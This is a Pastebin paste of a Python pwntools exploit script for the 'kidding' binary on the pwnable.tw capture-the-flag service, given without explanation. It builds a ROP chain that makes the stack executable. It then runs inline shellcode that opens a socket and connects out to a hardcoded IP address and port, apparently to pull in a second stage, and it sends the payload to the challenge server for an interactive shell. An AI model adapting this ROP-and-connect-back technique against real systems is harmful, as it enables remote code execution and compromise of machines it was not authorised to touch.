SHARE
TWEET

kidding.py

finalshare Nov 21st, 2018 108 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. import sys
  2. import time
  3. from pwn import *
  4. env = {
  5.     "LD_PRELOAD": "/home/nghiadt/Desktop/pwnable.tw/secret_of_heart/libc_64.so.6"  
  6. }
  7. libc=ELF("/home/nghiadt/Desktop/pwnable.tw/secret_of_heart/libc_64.so.6")
  8. context(os='linux', arch='i386', log_level='debug')
  9.  
  10.  
  11. def attach(listBp=[]):
  12.     gdb.attach(r,gdbscript=createGDBScript(listBp,pie=False))
  13. def createGDBScript(listBp,pie=False):
  14.     log.info("GDB script");
  15.  
  16.     script =""
  17.     if (pie):
  18.         script+='''
  19.         codebase
  20.         '''
  21.     for a in listBp:
  22.         if (pie):
  23.             script+="b * $piebase + "+hex(a)+"\n"
  24.         else :
  25.             script+="b * "+hex(a)+"\n"
  26.     script+='''
  27.         b* 0x80b8547
  28.         commands
  29. '''
  30.     script+="n\n"*50+"\nend\n"
  31.     script+="c\n"
  32.     #log.info(script);
  33.     return script
  34. if len(sys.argv) >1:
  35.     flag=1
  36.     r = remote("chall.pwnable.tw", 10303)
  37. else:
  38.     flag=0
  39.     r = process("./kidding",aslr=True,env=env)
  40.  
  41. def main():
  42.     #set 0x0805462b mov     [edx], eax
  43.     #0x0806ec8b POP EDX RET
  44.     #0x080b8536 POP EAX RET
  45.     #attach()
  46.     payload=""
  47.     payload=payload.ljust(12,"A")
  48.     payload+=p32(0x0806ec8b)# POP EDX RET
  49.     payload+=p32(0x080E9FEC)#EDX
  50.     payload+=p32(0x080b8536)#POP EAX RET
  51.     payload+=p32(0x7)
  52.     payload+=p32(0x0805462b)#mov     [edx], eax
  53.     payload+=p32(0x080b8536)#POP EAX RET
  54.     payload+=p32(0x080E9FC8)#__libc_stack_end
  55.     payload+=p32(0x0809A080)#_dl_make_stack_executable
  56.     payload+=p32(0x080b8546)#push esp;ret
  57.     payload+=asm('''  
  58.     push eax        
  59.     push  0x01  
  60.     push  0x02  
  61.     mov ecx, esp          
  62.     mov al, 0x66  
  63.     xor ebx, ebx    
  64.     mov bl, 0x01    
  65.     int 0x80
  66.     mov bl,0x3
  67.     push   0x2e811c95
  68.     pushw  0x672b
  69.     pushw  0x2
  70.     mov    ecx,esp
  71.     push   0x10
  72.     push   ecx
  73.     push   eax
  74.     mov al, 0x66  
  75.     mov    ecx,esp
  76.     int    0x80  
  77.     xchg al,bl
  78.     xor ebx,ebx
  79.     mov edx,esi
  80.    
  81.     mov    ecx,esp  
  82.     int    0x80  
  83.  
  84.     ''')
  85.     log.info("Length shellcode: "+str(len(payload)))
  86.     r.send(payload)
  87.     r.interactive()
  88.    
  89.    
  90.    
  91. if __name__ == "__main__":
  92.     main()
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top